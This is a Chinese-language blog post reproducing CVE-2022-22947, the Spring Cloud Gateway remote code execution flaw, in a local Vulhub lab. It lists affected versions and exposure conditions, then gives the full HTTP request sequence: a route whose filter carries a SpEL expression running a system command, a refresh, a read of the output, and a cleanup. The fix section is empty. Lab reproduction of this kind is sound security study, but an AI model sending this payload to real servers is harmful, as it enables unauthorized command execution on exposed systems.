CVE-2022-22947:Spring Cloud Gateway 远程代码执行漏洞复现及修复建议
CVE-2022-22947:Spring Cloud Gateway 远程代码执行漏洞复现及修复建议
关注WX:【小白SEC】查看更多内容……
CVE-2022-22947:Spring Cloud Gateway 远程代码执行漏洞复现及修复建议
本文仅为验证漏洞,在本地环境测试验证,无其它目的
CVE 编号:
CVE-2022-22947
漏洞说明:
2022年3月1日,VMware官方发布漏洞报告,在使用Spring Colud Gateway的应用程序开启、暴露Gateway Actuator端点时,会容易造成代码注入攻击,攻击者可以制造恶意请求,在远程主机进行任意远程执行。
漏洞影响范围:
- Spring Cloud Gateway 3.1.x < 3.1.1
- Spring Cloud Gateway 3.0.x < 3.0.7
- 旧的、不受支持的版本也会受到影响
漏洞级别:
高危
利用条件:
- 除了Spring Cloud Gateway 外,程序还用到了 Spring Boot Actuator 组件(它用于对外提供 /actuator/ 接口);
- Spring 配置对外暴露 gateway 接口,如 application.properties 配置为:
# 默认为true management.endpoint.gateway.enabled=true # 以逗号分隔的一系列值,默认为 health # 若包含 gateway 即表示对外提供 Spring Cloud Gateway 接口 management.endpoints.web.exposure.include=gateway
漏洞复现:
本次复现采用Vulhub靶场环境,需要在本地搭建Vulhub靶场(自行百度,如有问题可以沟通交流,后期时间充足可以再出Vulhub搭建教程),需注意将请求中的代码更换为靶机所在IP
(参考:Vulhub/CVE-2022-22947)
-
进入靶场环境:【Vulhub}-【Spring】-【CVE-2022-22947】
-
启动服务:
docker-compose up -d
-
访问靶场服务器IP+端口:http://192.168.32.130:8080
-
此处要注意,因为靶场会占用8080端口,所以当BP和靶场在统一环境下时,注意修改BP的8080端口为其他,并在浏览器中进行更新才能访问靶场环境
-
构造包含恶意请求的路由,利用BP进行发送:(图中标出的执行参数,更换id为whoami等可进行验证)
POST /actuator/gateway/routes/hacktest HTTP/1.1 Host: 192.168.32.130:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/json Content-Length: 329 { "id": "hacktest", "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}" } }], "uri": "http://example.com" }
-
然后应用刚添加的路由发送如下数据包,此数据包会触发表达式执行:
POST /actuator/gateway/refresh HTTP/1.1 Host: 192.168.32.130:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0
-
发送如下数据包可查看结果:
GET /actuator/gateway/routes/hacktest HTTP/1.1 Host: 192.168.32.130:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0
-
最后发送如下数据包进行清理,删除所添加的路由:
DELETE /actuator/gateway/routes/hacktest HTTP/1.1 Host: 192.168.32.130:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close
-
再次刷新路由:
POST /actuator/gateway/refresh HTTP/1.1 Host: 192.168.32.130:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0
-
以上漏洞环境使用完成后,使用以下命令进行环境移除:
docker-compose down
如果不会搭建Vulhub本地靶场,可利用VulFOCUS在线靶场,进行注册后在线使用,有问题可以交流
漏洞修复:
为开发者提供学习成长、分享交流、生态实践、资源工具等服务,帮助开发者快速成长。
更多推荐
4
0- 0
已为社区贡献2条内容
所有评论(0)